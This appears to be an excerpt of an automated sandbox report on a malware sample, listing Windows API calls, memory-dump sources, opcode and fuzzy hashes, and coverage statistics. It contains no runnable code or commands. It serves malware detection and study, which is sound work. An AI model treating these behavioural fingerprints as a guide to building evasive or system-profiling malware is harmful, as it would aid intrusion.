• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                          • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                          • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                          • Instruction ID: bf1d7cff2fc5b19e5de1a229c4e7eaa26ad437be02c7fe772a9c732b09444fc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31E722D39284BBCF329A685804AF77B749FA2779F1DC167E44C4B392D12D9C44C6AC

Control-flow Graph
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
• Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
• Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
• Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
• Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Control-flow Graph
APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506

Control-flow Graph (rendered graph not reproduced)
APIs
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0

Control-flow Graph (rendered graph not reproduced)
APIs
• EntryPoint.YMAFVVDS(80070057), ref: 004017EE
  • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
  • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
• EntryPoint.YMAFVVDS(80070057), ref: 00401800
• EntryPoint.YMAFVVDS(80070057), ref: 00401813
• __recalloc.LIBCMT ref: 00401828
• EntryPoint.YMAFVVDS(8007000E), ref: 00401839
• EntryPoint.YMAFVVDS(8007000E), ref: 00401853
• _calloc.LIBCMT ref: 00401861
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
• String ID:
• API String ID: 1721462702-0

Control-flow Graph (rendered graph not reproduced)
APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Strings
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2395185920-0
                                                                                                                                                                                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
• Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
• Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
APIs
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 97.6%
Signature Coverage: 9.6%
Total number of Nodes: 83
Total number of Limit Nodes: 5

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 50fb018fb414dfaef4ce8b5813ed76c5dafec3114e629dc7deaeeb645d738a5c
• Instruction ID: 0df75b0f3e7a9f6b47911572c58d1ce1b0426e276e3b5715d4a695722b51c6fa
• Opcode Fuzzy Hash: 50fb018fb414dfaef4ce8b5813ed76c5dafec3114e629dc7deaeeb645d738a5c
• Instruction Fuzzy Hash: 12D11735518F09CBC7A8EF58D845BEAB7D1FBA0310F18461FD846C3264DA78DA458ACB

Control-flow Graph

• Executed
• Not Executed
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 004A53C4
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 5c2eebae1930c836f5ab933412e7c3180a40499b89c862095b54e74288c17e3a
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 88412B5240DE958FDB26422457243767BA0AB773E2F9D04D7D883CB2E2D19C0C86972F

Control-flow Graph (graph rendering omitted; node listing not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf7e178ce7ef8c8b8ed7a0a6b190087b473b65ce30721fb285446cac81d704f7
• Instruction ID: bbed80a22702128bee11be346f0823842681b1d387ef945bcc9606c69e636c07
• Opcode Fuzzy Hash: cf7e178ce7ef8c8b8ed7a0a6b190087b473b65ce30721fb285446cac81d704f7
• Instruction Fuzzy Hash: D3611F3260CA458FDB659B28881833B7AA0FB77350F59469FE446C32A1DF2C8C46934F

Control-flow Graph (graph rendering omitted; node listing not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID:
• String ID:
